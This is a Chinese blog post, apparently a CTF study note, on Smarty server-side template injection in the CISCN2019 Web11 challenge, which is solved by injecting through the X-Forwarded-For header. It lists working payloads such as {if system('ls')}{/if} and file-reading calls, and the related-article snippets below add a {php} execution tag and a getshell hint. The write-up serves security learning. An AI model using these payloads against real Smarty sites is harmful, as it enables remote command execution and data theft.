smarty ssti的学习--Day32

最新推荐文章于 2024-08-22 20:52:46 发布
最新推荐文章于 2024-08-22 20:52:46 发布
阅读量575 收藏 1
点赞数 1
分类专栏: 日常学习小记 CTF题目 ssti
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/veinard_F/article/details/110200396
版权

基于[CISCN2019 华东南赛区]Web11这道题目,学习一下smarty sstii
smarty是一个php的模板引擎,提供让程序逻辑与页面显示代码(css/html)分离的功能。

smarty利用

  • {php}

Smarty3官方手册里说到已经废弃{php}标签,强烈建议不要使用。在Smarty3.1,{php}仅在SmartyBC中可用。

  • {literal}
    php5可用,可以让一个模板区域的字符原样输出,经常用于保护页面上的javascrip或css样式表
  • {if}
    Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}, 全部的PHP条件表达式和函数都可以在if内使用,如||,or,&&,and,is_array()等

该题目用burpsuit抓包后根据提示改xff,可以发现存在ssti注入,并且题目中也提示了smarty,那么就可以用{if}{/if}这样的标签来读flag。
在这里插入图片描述
smarty常用payload:

{if phpinfo()}{/if}
{if system('ls')}{/if}
{ readfile('/flag') }
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if}
piubiutiu~
关注
专栏目录
[CISCN 2019华东南]Web11(SSTI Smarty
weixin_74020633的博客
03-19 316
与sql注入类似,也是通过凭借进行命令的执行,sql是和数据库的查询语句进行拼接。在利用SSTI注入时,在Smarty中一般用{php}{/php}标签来进行包裹执行php语句,在查询wp和一些资料后,得知{php}标签被强烈建议不使用,只有在SmartyBC中可用;{if}标签和php中的if判断类似,而且可以正常使用php中的函数和符号,不过在使用时,要配上{/if}说明是Smarty类型,可以开始包裹php语句进行查询了(除了加个{if}标签,还是用的php语句)在判断SSTI类型时,有一张图。
[CISCN2019 华东南赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 460
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
深入解析Smarty SSTI 利用
m0_68483928的博客
08-22 632
Smarty是基于PHP开发的,对于SmartySSTI 的利用与常见的flask的SSTI有很大区别,了解过Jinjia2模板注入的应该知道,Jinjia2是基于python的,而Smarty是基于PHP的,所以使用起来还是比较容易地,我们只需要达到 命令执行即可
Smarty SSTI
蚁景网安学院
11-13 1020
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多文章往往只是一笔带过,讲解的重心往往在flask等框架上。本篇...
【Web】Smarty SSTI
uuzeray的博客
11-13 385
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。Smarty是基于PHP开发的,故对于SmartySSTI的利用手段与常见的flask的SSTI有很大区别。
SSTI相关总结 (smarty/twig)
桃雾雨Rain的博客
01-30 947
SSTI在用户可控的地方可能发生。 一、PHP smarty注入 smarty是php的一个模板引擎。更明确的来说,它可以帮助开发者更好的分离程序逻辑和页面显示。这里略过一些罗嗦的smarty的介绍。 *payload (1) 获取smarty版本号: {$smarty.version} (2) 执行php代码 {php}echo `id`;{/php} //注意这个在3.x版本的时候就已经废弃了 (3) getshell {Smarty_Internal_Write_File::writ
smarty-vscode-support:用于Visual Studio Code的Smarty模板支持扩展
05-01
用于Visual Studio代码的Smarty模板 此扩展为Visual Studio Code提供支持。 支持{...}和{{...}}分隔符。 特征 语法高亮 片段完成 代码格式 代码折叠 代码导航 评论切换 支架自动关闭 支架自动环绕 悬停文档 自动...
基于PHP+MySQL+Smarty的M-Blog开源博客设计源码
最新发布
09-25
该项目是一款基于PHP、MySQL及Smarty框架构建的开源博客系统——M-Blog。项目源码包含295个文件,其中PHP文件155个,PNG及GIF图片文件共计64个,JavaScript、HTML、CSS及JPG文件分别有27、21、15和5个,同时包含1个...
Smarty-Streets-AutoCompleteTextView:Gradle库。 接收并显示Smarty Streets地址建议的Android AutocompleteTextView
02-04
Smarty Streets AutoCompleteTextView Gradle库。 Android AutoCompleteTextView,它接收并显示来自SmartyStreets的美国地址建议。 不提供地址建议,仅提供地址验证和邮政编码查找。 演示版 是的,有一个演示应用...
smarty-custom-plugins:这是 Smarty 自定义插件
07-11
#Smarty 自定义插件 这是 Smarty 自定义插件。 目录 一、要求 Smarty 自定义插件 2.x:PHP 5.3+、Smarty 3+ Smarty 自定义插件 1.x:PHP 4 或 5,Smarty 2+ (不再支持 1.x。) 2. 安装 下载 Smarty 自定义插件。 ...
php之smarty篇(二)--smarty基础
04-06
NULL 博文链接:https://firedragonpzy.iteye.com/blog/1551533
Smarty SSTI--[CISCN2019 华东南赛区]Web11
K1ose的博客
03-08 208
Smarty SSTI–[CISCN2019 华东南赛区]Web11 访问页面,页脚提示smarty; 根据先前对Smarty的接触,比较了解的是SSTI的漏洞; 题目提示了XFF,试一下XFF处有没有SSTI漏洞注入点; 抓包修改,添加XFF; {{7*7}} 可以注意到response的信息中,有一处变化; 证明确实存在SSTI漏洞; 输入 {$smarty.version} 以获得对应的smarty版本; 输入 {$smarty.template} 以返回当前的模板文件的名称; 输入 {i
8-14刷题(php反序列化,Smarty ssti,json命令执行)
Realiy的博客
08-14 977
[NPUCTF2020]ReadlezPHP 找到time.php?source,打开的得到time.php的源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } publ
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1717
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
细说Jinja2之SSTI&bypass
蚁景网安学院
12-18 3750
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
[CISCN 2019华东南]Web11 和[NISACTF 2022]midlevel
Leaf_initial的博客
04-27 469
Smarty是基于PHP开发的,对于SmartySSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。
[CISCN2019 华东南赛区]Web11 1
shinygod的博客
03-23 2875
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做题前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值